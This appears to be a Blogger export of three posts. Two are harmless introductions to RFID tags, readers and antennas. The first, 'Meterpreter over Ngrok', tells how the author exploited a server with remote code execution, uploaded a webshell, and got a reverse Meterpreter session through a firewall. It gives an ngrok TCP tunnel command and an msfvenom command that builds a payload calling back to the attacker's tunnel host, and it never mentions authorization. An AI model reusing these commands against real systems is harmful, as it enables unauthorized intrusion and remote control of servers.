tag:blogger.com,1999:blog-90215395951091958522024-03-13T23:22:58.587+05:30Abyss ZircanavoAbyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.comBlogger12125tag:blogger.com,1999:blog-9021539595109195852.post-4195490183365832482017-05-01T16:06:00.000+05:302017-05-01T16:08:50.228+05:30Meterpreter over Ngrok<span style="font-size: large;">It's been a very interesting year for me. getting reverse meterpreter connections over ssh tunnels, paranoid mode, bypassing AVs, and even getting reverse VNC connection via "vnc dll injection" method to get a GUI view over a vulnerable server with no access to RDP. It's good to have a VPS just for this purpose. but there are times when I don't want to authenicate to my VPS and set a teamserver to connect my Armitage to the VPS, people tends to get lazy over doing things like this in a repeated manner. Hackers especially.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If using metasploit locally on the system, I can't always set up a reverse connection over NAT.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now here's the Current Situation!</span><br />
<span style="font-size: large;"><br /></span>
<ul>
<li><span style="font-size: large;">I found a server vulnerable to Remote RCE.</span></li>
<li><span style="font-size: large;">Uploaded a webshell to gather some info.</span></li>
<li><span style="font-size: large;">Uploaded an exe after carefully testing it against the AV installed over the server.</span></li>
<li><span style="font-size: large;">Booted up metasploit.</span></li>
<li><span style="font-size: large;">Tried to exploit it to get a bind shell but unforunately bind shell is not working (Firewall as always).</span></li>
<li><span style="font-size: large;">Let's do a Reverse then ;)</span></li>
<li><span style="font-size: large;">But there's another problem :(</span></li>
<li><span style="font-size: large;">I'm Sitting in office and sadly I don't have Router login credentials for setting up port forwarding :(</span></li>
</ul>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now what to do?</span><br />
<span style="font-size: large;">Here comes Ngrok to the rescue. :D</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">What's Ngrok?</span><br />
<span style="font-size: large;">"secure introspected tunnels to localhost" & "Expose local servers behind NATs and firewalls to the public internet over secure tunnels." - direct from their <a href="https://ngrok.com/">website</a></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Setting up Ngrok</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">1. Register to ngrok. (It doesn't verify the email id though)</span><br />
<span style="font-size: large;">2. once you're logged in, just follow the instruction. you'll get a screen like this.</span><br />
<span style="font-size: large;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-YDu2fYlTPLA/WQcMsQsgxPI/AAAAAAAAJis/pAK26pIWOM0flMFg9dhILj-ODam6v__YACLcB/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="455" src="https://1.bp.blogspot.com/-YDu2fYlTPLA/WQcMsQsgxPI/AAAAAAAAJis/pAK26pIWOM0flMFg9dhILj-ODam6v__YACLcB/s640/1.png" width="640" /></span></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">3. Once the setup is done, run the following command to run ngrok to listen for tcp connect on a random port and forward it to our system over NAT.</span><br />
<span style="font-size: large;"><br /></span>
<blockquote class="tr_bq">
<span style="color: orange; font-size: large;">./ngrok tcp 80</span></blockquote>
<span style="font-size: large;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-VIoa_7NIe2I/WQcM0s69ppI/AAAAAAAAJiw/ZHp9Yk-szng2PQ6-U0YjGUvUnndiZzH_wCLcB/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="342" src="https://2.bp.blogspot.com/-VIoa_7NIe2I/WQcM0s69ppI/AAAAAAAAJiw/ZHp9Yk-szng2PQ6-U0YjGUvUnndiZzH_wCLcB/s640/2.png" width="640" /></span></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">4. generating meterpreter exe with ngrok settings and setup a handler to accept reverse meterpreter connection.</span><br />
<span style="font-size: large;"><br /></span>
<blockquote class="tr_bq">
<span style="color: orange; font-size: large;">msfvenom -p windows/meterpreter/reverse_tcp_dns lport=12791 lhost=<ngrok domain> -f exe -o test.exe</span></blockquote>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The above command will generate a simple exe with meterpreter stub. NOTE, I'm NOT sharing the techniques for bypassing AVs. Also, please do not upload your exe to any online scanner (if custom made), that's a very stupid thing to do. Better use <a href="https://github.com/mubix/vt-notify">vt-notify</a> by @Mubix. A great tool!</span><br />
<span style="font-size: large;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-XbXtIj_KLYU/WQcOAE1sIkI/AAAAAAAAJi8/mbMUjF3gNf0UF_7ITrrMGVyN-amg5vWZQCLcB/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="224" src="https://2.bp.blogspot.com/-XbXtIj_KLYU/WQcOAE1sIkI/AAAAAAAAJi8/mbMUjF3gNf0UF_7ITrrMGVyN-amg5vWZQCLcB/s640/3.png" width="640" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-rbf2zZb3o_8/WQcOPZgZ88I/AAAAAAAAJjA/WlhTSd8jezoMHrSXEWTERTZ1r1ZQ2R4VgCLcB/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="136" src="https://4.bp.blogspot.com/-rbf2zZb3o_8/WQcOPZgZ88I/AAAAAAAAJjA/WlhTSd8jezoMHrSXEWTERTZ1r1ZQ2R4VgCLcB/s640/4.png" width="640" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: large;"><br /></span></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">5. Now execute the exe and you'll see the words that'll make you go crazy - "Sending Stage bytes" ;)</span><br />
<span style="font-size: large;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-lt6852Ixs-0/WQcNO7MFZ4I/AAAAAAAAJi0/nN3vmJxF3PoaJwH5Nv2R1UUKpzzusp_ggCLcB/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="94" src="https://2.bp.blogspot.com/-lt6852Ixs-0/WQcNO7MFZ4I/AAAAAAAAJi0/nN3vmJxF3PoaJwH5Nv2R1UUKpzzusp_ggCLcB/s640/3.png" width="640" /></span></a></div>
<span style="font-size: large;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-rrg2Y3veXYE/WQcOvjIsviI/AAAAAAAAJjI/HEEdifKXD18sbumAmDXZTqietP_dS_JaACLcB/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="306" src="https://4.bp.blogspot.com/-rrg2Y3veXYE/WQcOvjIsviI/AAAAAAAAJjI/HEEdifKXD18sbumAmDXZTqietP_dS_JaACLcB/s640/6.png" width="640" /></span></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now where did "127.0.0.1" came from? o_O</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Ngrok is forwarding the connection to our local system so obviously, it will show "127.0.0.1" to us. When the handler receives the stager and starts sending the stage to the server, it goes through our localhost's forwarded port.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Ngrok Dashboard can help you see the number of connections you're having.</span><br />
<span style="font-size: large;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-DhrdUV0PSYQ/WQcPEBwJ-hI/AAAAAAAAJjM/AP8x3ttAk6woaAdVufH9DJwl0ZMOOg50gCLcB/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-size: large;"><img border="0" height="420" src="https://1.bp.blogspot.com/-DhrdUV0PSYQ/WQcPEBwJ-hI/AAAAAAAAJjM/AP8x3ttAk6woaAdVufH9DJwl0ZMOOg50gCLcB/s640/7.png" width="640" /></span></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">6. A drawback with this method, you can't get multiple meterpreter sessions over a single port. for multiple sessions, you have to follow all the steps all over again with a different port.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I Hope this helps.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Thanks & Cheers!!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />Abyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.com7tag:blogger.com,1999:blog-9021539595109195852.post-72954448684792584552015-05-13T14:05:00.001+05:302017-01-09T09:00:19.013+05:30Introduction to RFID Technology (part 2)<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<br />
<div style="text-align: center;">
NOTE: If you haven't read about <a href="https://zircanavo-abyss.blogspot.in/2015/05/introduction-to-rfid-technology-part-1.html"><span style="color: yellow;">part 1</span></a>, then please do so.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-drnwONaczXE/VVMGkjcpJNI/AAAAAAAACSs/GNAxzPka-P8/s1600/2015-05-13%2B13_27_09-cdn.intechopen.com_pdfs-wm_16518.pdf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://4.bp.blogspot.com/-drnwONaczXE/VVMGkjcpJNI/AAAAAAAACSs/GNAxzPka-P8/s640/2015-05-13%2B13_27_09-cdn.intechopen.com_pdfs-wm_16518.pdf.png" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<br />
<div style="text-align: center;">
<span style="font-size: x-large;">Types of RFID Tags</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Active Tags</span></div>
<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
In active RFID systems, tags have their own transmitter and power source. Usually, the power source is a battery. Active tags broadcast their own signal to transmit the information stored on their microchips.</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-c3v75KY2YNY/VVMGmowZZ7I/AAAAAAAACS0/2gDu-gYC0qI/s1600/active_tag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://1.bp.blogspot.com/-c3v75KY2YNY/VVMGmowZZ7I/AAAAAAAACS0/2gDu-gYC0qI/s640/active_tag.png" width="640" /></a></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
Active RFID systems typically operate in the ultra-high frequency (UHF) band and offer a range of up to 100 m. In general, active tags are used on large objects, such as rail cars, big reusable containers, and other assets that need to be tracked over long distances.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>There are two main types of active tags:<b> transponders</b> and <b>beacons</b>. </div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>Transponders</b> are “woken up” when they receive a radio signal from a reader, and then power on and respond by transmitting a signal back. Because transponders do not actively radiate radio waves until they receive a reader signal, they conserve battery life.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b>Beacons</b> are used in most real-time locating systems (RTLS), in order to track the precise location of an asset continuously. Unlike transponders, beacons are not powered on by the reader’s signal. Instead, they emit signals at pre-set intervals. Depending on the level of locating accuracy required, beacons can be set to emit signals every few seconds, or once a day. Each beacon’s signal is received by reader antennas that are positioned around the perimeter of the area being monitored, and communicates the tag’s ID information and position.</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Tag Power Source</i></b> : Internal to tag</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Tag Battery</i></b> : Yes</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Availability of Tag Power</i></b> : Continuous</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Required Signal Strength from Reader to Tag</i></b> : Very Low</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Available Signal Strength from Tag to Reader</i></b> : High</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Communication Range</i></b> : Long Range (100m or more) </div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Sensor Capability</i></b> : Ability to continuously monitor and record sensor input.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Passive Tags</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
In passive RFID systems, the reader and reader antenna send a radio signal to the tag. The RFID tag then uses the transmitted signal to power on, and reflect energy back to the reader. This is called <b>Backscatter Modulation.</b></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Passive RFID systems can operate in the low frequency (LF), high frequency (HF) or ultra-high frequency (UHF) radio bands. </div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-mMxlhy0BugU/VVMJpJYjajI/AAAAAAAACTQ/_TkG291Jcgg/s1600/Backscatter_diagram_large_v2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="418" src="https://1.bp.blogspot.com/-mMxlhy0BugU/VVMJpJYjajI/AAAAAAAACTQ/_TkG291Jcgg/s640/Backscatter_diagram_large_v2.jpg" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
As passive system ranges are limited by the power of the tag’s backscatter (the radio signal reflected from the tag back to the reader), they are typically less than 10 m. Because passive tags do not require a power source or transmitter, and only require a tag chip and antenna, they are cheaper, smaller, and easier to manufacture than active tags.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Passive tags can be packaged in many different ways, depending on the specific RFID application requirements. For instance, they may be mounted on a substrate, or sandwiched between an adhesive layer and a paper label to create smart RFID labels. Passive tags may also be embedded in a variety of devices or packages to make the tag resistant to extreme temperatures or harsh chemicals.</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-vGIq4q-Vxmo/VVMGpj6mhSI/AAAAAAAACS8/FrpZkyISxA4/s1600/passive_tag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://2.bp.blogspot.com/-vGIq4q-Vxmo/VVMGpj6mhSI/AAAAAAAACS8/FrpZkyISxA4/s640/passive_tag.png" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Passive RFID solutions are useful for many applications, and are commonly deployed to track goods in the supply chain, to inventory assets in the retail industry, to authenticate products such as pharmaceuticals, and to embed RFID capability in a variety of devices. Passive RFID can even be used in warehouses and distribution centers, in spite of its shorter range, by setting up readers at choke points to monitor asset movement.</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Tag Power Source</i></b> : Energy transfer from the reader via RF</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Tag Battery</i></b> : No</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Availability of Tag Power</i></b> : Only within field of reader</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Required Signal Strength from Reader to Tag</i></b> : Very high (must power the tag)</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Available Signal Strength from Tag to Reader</i></b> : Very Low</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Communication Range</i></b> : Short range (up to 10m) </div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Sensor Capability</i></b> : Ability to read and transfer sensor values only when tag is powered by reader</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Semi-Passive / Battery Assisted Passive (BAP) Tags</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
A Battery-Assisted Passive RFID tag is a type of passive tag which incorporates a crucial active tag feature. While most passive RFID tags use the energy from the RFID reader’s signal to power on the tag’s chip and backscatter to the reader, BAP tags use an integrated power source (usually a battery) to power on the chip, so all of the captured energy from the reader can be used for backscatter. </div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-L5plZEJwO5s/VVMGp3JEJZI/AAAAAAAACTA/piIps4ucPEc/s1600/semi-passive_tag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://2.bp.blogspot.com/-L5plZEJwO5s/VVMGp3JEJZI/AAAAAAAACTA/piIps4ucPEc/s640/semi-passive_tag.png" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Unlike transponders, BAP tags do not have their own transmitters.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Tag Power Source</i></b> : Tag uses internal power source to power on, and energy transferred from the reader via RF to backscatter</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Tag Battery</i></b> : Yes</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Availability of Tag Power</i></b> : Only within field of reader</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Required Signal Strength from Reader to Tag</i></b> : Moderate (does not need to power tag, but must power backscatter)</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Available Signal Strength from Tag to Reader </i></b>: Moderate</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Communication Range</i></b> : Moderate range (up to 100m) </div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><i>Sensor Capability</i></b> : Ability to read and transfer sensor values only when tag receives RF signal from reader</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Other RFID tags (active/passive/BAP)</span></div>
<div style="text-align: center;">
<span style="font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-pXto4QM1T40/VVMLZbC_8ZI/AAAAAAAACTc/64xOZCxFS-Q/s1600/rfid-tags-for-solar-module-india.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="482" src="https://2.bp.blogspot.com/-pXto4QM1T40/VVMLZbC_8ZI/AAAAAAAACTc/64xOZCxFS-Q/s640/rfid-tags-for-solar-module-india.JPG" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Reference : (in part3)</div>
Abyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.com1tag:blogger.com,1999:blog-9021539595109195852.post-70488768558094925552015-05-12T12:19:00.000+05:302015-05-12T12:22:39.805+05:30Introduction to RFID Technology (Part 1)<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-vwYohOh5Sec/VVGW1nKIFrI/AAAAAAAACRc/czjWR3-qXz4/s1600/rfid.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="505" src="http://1.bp.blogspot.com/-vwYohOh5Sec/VVGW1nKIFrI/AAAAAAAACRc/czjWR3-qXz4/s640/rfid.jpg" width="640" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-large;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: x-large;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: x-large;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: x-large;">what is RFID?</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
RFID, short for Radio Frequency IDentification, is a technology that enables identification of a tag (that is normally attached with an entity) by using electromagnetic waves. The function served by RFID is similar to bar code identification, but line of sight signals are not required for operation of RFID.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-large;">RFID components</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Tag</span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Tag chips or integrated circuits (ICs)</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Tag antennas</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Reader</span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Reader antenna</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Reader control & application software</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-large;">RFID Tags</span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: justify;">
<a href="http://2.bp.blogspot.com/-_jzgEfeTsZg/VVGZ_3liAFI/AAAAAAAACR8/7JMVz8-6ck0/s1600/rfidlabel2.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="http://2.bp.blogspot.com/-_jzgEfeTsZg/VVGZ_3liAFI/AAAAAAAACR8/7JMVz8-6ck0/s1600/rfidlabel2.jpg" /></a>An RFID tag is comprised of an integrated circuit (called an IC or chip) attached to an antenna that has been printed, etched, stamped or vapor-deposited onto a mount which is often a paper substrate or PolyEthylene Therephtalate (PET). The chip and antenna combo, called an inlay, is then converted or sandwiched between a printed label and its adhesive backing or inserted into a more durable structure.</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-size: large;">Tag Chip</span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>The tag's chip or integrated </div>
circuit (IC) delivers performance, memory and extended features to the tag. The chip is pre-programmed with a tag identifier (TID), a unique serial number assigned by the chip manufacturer, and includes a memory bank to store the items' unique tracking identifier (called an electronic product code or EPC).<br />
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-size: large;">Electronic Product Code (EPC)</span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>The electronic product code (EPC) stored in the tag chip's memory is written to the tag by an RFID printer and takes the form of a 96-bit string of data. The first eight bits are a header which identifies the version of the protocol. The next 28 bits identify the organization that manages the data for this tag; the organization number </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-X_n76ejBwTk/VVGYz8W6MBI/AAAAAAAACRw/svWkjzWRT40/s1600/epc-rfid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://1.bp.blogspot.com/-X_n76ejBwTk/VVGYz8W6MBI/AAAAAAAACRw/svWkjzWRT40/s640/epc-rfid.png" width="640" /></a></div>
is assigned by the EPCglobal consortium. The next 24 bits are an object class, identifying the kind of product; the last 36 bits are a unique serial number for a particular tag. These last two fields are set by the organization that issued the tag. The total electronic product code number can be used as a key into a global database to uniquely identify that particular product.<br />
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-size: large;">Tag Antennas</span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Tag antennas collect energy and channel it to the chip to turn it on. Generally, the larger the tag antenna's area, the more energy it will be able to collect and channel toward the tag chip, and the further read range the tag will have.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<a href="http://2.bp.blogspot.com/-pFLXWWQufuM/VVGXbBYHpYI/AAAAAAAACRk/Um6EGB5FObU/s1600/tag.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="http://2.bp.blogspot.com/-pFLXWWQufuM/VVGXbBYHpYI/AAAAAAAACRk/Um6EGB5FObU/s1600/tag.jpg" /></a><span class="Apple-tab-span" style="white-space: pre;"></span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span"> </span>There is no perfect antenna for all applications. It is the application that defines the antenna specifications. Some tags might be optimized for a particular frequency band, while others might be tuned for good performance when attached to materials that may not normally work well for wireless communication (certain liquids and metals, for example). Antennas can be made from a variety of materials; they can be printed, etched, or stamped with conductive ink, or even vapor deposited onto labels.</div>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Tags that have only a single antenna are not as reliable as tags with multiple antennas. With a single antenna, a tag's orientation can result in “dead zones”, or areas on the tag where incoming signals cannot be easily harvested to provide sufficient energy to power on the chip and communicate with the reader. A tag with dual antennas is able to eliminate these dead zones and increase its readability but requires a specialized chip.</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-size: x-large;">RFID Readers</span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<a href="http://3.bp.blogspot.com/-NMBIShZReuE/VVGaccRjU0I/AAAAAAAACSE/mur9MAOW_Z4/s1600/10132057-long-range-uhf-rfid-reader-dl910.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="243" src="http://3.bp.blogspot.com/-NMBIShZReuE/VVGaccRjU0I/AAAAAAAACSE/mur9MAOW_Z4/s320/10132057-long-range-uhf-rfid-reader-dl910.jpg" width="320" /></a><span class="Apple-tab-span" style="white-space: pre;"></span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span"> </span>An RFID reader, also known as an interrogator, is a device that provides the connection between the tag data and the enterprise system software that needs the information. The reader communicates with tags that are within its field of operation, performing any number of tasks including simple continuous inventorying, filtering (searching for tags that meet certain criteria), writing (or encoding) to selected tags, etc.</div>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>The reader uses an attached antenna to capture data from tags. It then passes the data to a computer for processing. Just like RFID tags, there are many different sizes and types of RFID readers. Readers can be affixed in a stationary position in a store or factory, or integrated into a mobile device such as a portable, handheld scanner. Readers can also be embedded in electronic equipment or devices, and in vehicles.</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-size: large;">Reader Antennas</span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>RFID readers and reader antennas work together to read tags. Reader antennas convert electrical current into electromagnetic waves that are then radiated into space where they can be received by a tag antenna and converted back to electrical current. Just like tag antennas, there is a large variety of reader antennas and optimal antenna selection varies according to the solution's specific application and environment.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>The two most common antenna types are <b>linear</b>- and <b>circular-polarized</b> antennas. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Antennas that radiate linear electric fields have long ranges, and high levels of power that enable their signals to penetrate through different materials to read tags. Linear antennas are sensitive to tag orientation; depending on the tag angle or placement, linear antennas can have a difficult time reading tags. Conversely, antennas that radiate circular fields are less sensitive to orientation, but are not able to deliver as much power as linear antennas.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="background-color: white; padding: 0px;">
